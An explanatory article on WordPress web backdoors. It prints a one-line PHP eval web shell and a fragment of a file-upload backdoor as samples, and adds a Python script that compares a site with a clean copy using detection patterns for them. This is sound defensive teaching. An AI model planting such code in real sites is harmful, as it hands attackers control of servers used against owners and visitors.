
What is a backdoor? The dangers and methods

A backdoor is a method, often secret, of bypassing normal authentication or encryption in a computer system, a product, or an embedded device (e.g. a home router), or its embodiment, e.g. as part of a cryptosystem, an algorithm, a chipset, or a “homunculus computer” —a tiny computer-within-a-computer (such as that found in Intel’s AMT technology).[1][2] Backdoors are often used for securing remote access to a computer, or obtaining access to plaintext in cryptographic systems. The backdoor may be used to gain access to passwords, delete data on hard drives, or transfer information within the cloud.  By Wikipedia

Nowadays, with the widespread use of WordPress, anyone can run their own media site. At the same time, many malicious programs called "web backdoors" are being installed on servers by tampering with a website's program files. They have been confirmed on many sites and are spreading around the world.


Web backdoor functions

A web backdoor is a file that lets a hacker place arbitrary files on a server or rewrite the contents of other files.
Hackers who have taken over WordPress administrator privileges use the WordPress file export feature to install a backdoor on the server. They then perform various unauthorized activities via the backdoor:

● Distribute spam mail
● Use the server as a springboard to attack other sites
● Mine virtual currency
● Insert links to some site to try to improve its search ranking
● Operate fraud sites on the server

As a result, the compromised site may end up involved in acts that harm others and in criminal acts.

Web backdoors are difficult to find and eliminate

Once a site is hacked and a backdoor is installed, finding the code is not easy.
This is because WordPress generally includes more than 5000 files, including themes and plug-ins.

Also, most backdoors do not disappear even if you later update WordPress or its plug-ins. Even if you remove the malware once, the backdoor remains on the server, and the hacker can place malicious files on the server again through this backdoor file.

Web backdoor code examples

The backdoor code is often very simple and short. Take the following structure as an example:

@eval($_POST["code"]);

This code lets a hacker remotely send any kind of program to the server and run it to carry out illegal activities. It may be obfuscated.

In some cases, the backdoor provides a form for uploading files directly:

<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "File  ".$_FILES['file']['name']."  uploaded";
} else {
    print "Not working: info:\n";
    print_r($_FILES);
}
}
break;
}

This code is not obfuscated. It is written as very plain code, so the backdoor is hard to notice, and it is difficult to find without comparing the files against the original WordPress files.
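One way to do the comparison against the original files described above, as an added example (not code from the original page or from any scanner it mentions). It assumes a clean copy of the same WordPress release, themes and plug-ins is available; the names compare, demo and PATTERNS and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# The two backdoor shapes shown on this page. Obfuscated code will not match,
# so the added/modified lists are the primary signal, not these patterns.
PATTERNS = [
    re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b"),
    re.compile(r"(copy|move_uploaded_file)\s*\(\s*\$_FILES\b"),
]

def compare(site, clean):
    """Diff a live tree against a clean copy of the same release."""
    site, clean = Path(site), Path(clean)
    report = {"added": [], "modified": [], "flagged": []}
    for f in sorted(p for p in site.rglob("*") if p.is_file()):
        rel = f.relative_to(site).as_posix()
        ref = clean / rel
        if not ref.is_file():
            report["added"].append(rel)
        elif f.read_bytes() != ref.read_bytes():
            report["modified"].append(rel)
        else:
            continue  # identical to the clean copy: nothing to review
        text = f.read_text(errors="replace")
        if any(p.search(text) for p in PATTERNS):
            report["flagged"].append(rel)
    return report

def demo():
    """Build constructed sample trees (not real WordPress files) and diff them."""
    root = Path(tempfile.mkdtemp())
    files = {
        "clean/index.php": "<?php require 'wp-blog-header.php';",
        "clean/wp-includes/load.php": "<?php function wp_load() {}",
        "site/index.php": "<?php require 'wp-blog-header.php';",
        "site/wp-includes/load.php":
            "<?php function wp_load() {}\n@eval($_POST[\"code\"]);",
        "site/wp-content/uploads/cache.php":
            "<?php copy($_FILES['file']['tmp_name'], $_POST['path']);",
        "site/wp-content/uploads/logo.txt": "constructed user upload",
    }
    for name, body in files.items():
        (root / name).parent.mkdir(parents=True, exist_ok=True)
        (root / name).write_text(body)
    return compare(root / "site", root / "clean")

if __name__ == "__main__":
    print(demo())
```

Files listed as added under an uploads directory are expected for legitimate media, so PHP files there and any modified core file are the ones to review first.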

Web backdoors exist not only on large sites but also on low-traffic sites

Do you think that a site that doesn’t get a lot of traffic won’t be hacked?

Hackers automatically visit a vast number of websites to find ones with security vulnerabilities, and they plant tampered files without passing over small or neglected sites.

This is because on a small or abandoned site it takes longer for the malware to be discovered, and eliminating it is technically difficult.
